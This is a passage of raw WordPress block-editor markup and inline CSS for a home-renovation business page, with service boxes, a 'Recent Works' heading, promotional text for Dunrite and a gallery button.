2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"6144aa30-a171-49e0-ba02-9fdbf6c0339a\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\"><strong>Miscellaneous</strong></h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"d3c03c5f-5606-4310-98a4-30d73f9945ed\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d3c03c5f-5606-4310-98a4-30d73f9945ed\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"bbb98fc7-3a1c-40ca-8905-157ad2df8e24\"} -->\n<style type=\"text/css\"> .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Insurance</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6e721bfc-c727-4b32-a621-9a1dcc0e501c\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-6e721bfc-c727-4b32-a621-9a1dcc0e501c background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"994f6e51-2a17-435a-8b2f-9235a8bb8702\"} -->\n<style type=\"text/css\"> .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-994f6e51-2a17-435a-8b2f-9235a8bb8702 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"2ac6f6b9-bced-48f5-9f60-eae03e300214\"} -->\n<style type=\"text/css\"> .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2ac6f6b9-bced-48f5-9f60-eae03e300214\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\"><strong>We take pride in our work</strong></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">100% customer satisfaction. Locally owned and operated for 25+ years</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\"> Contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://dunriteroof.com/gallery\",\"counterId\":\"47168312-0ca1-4133-bab7-40d5c2e35f72\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n 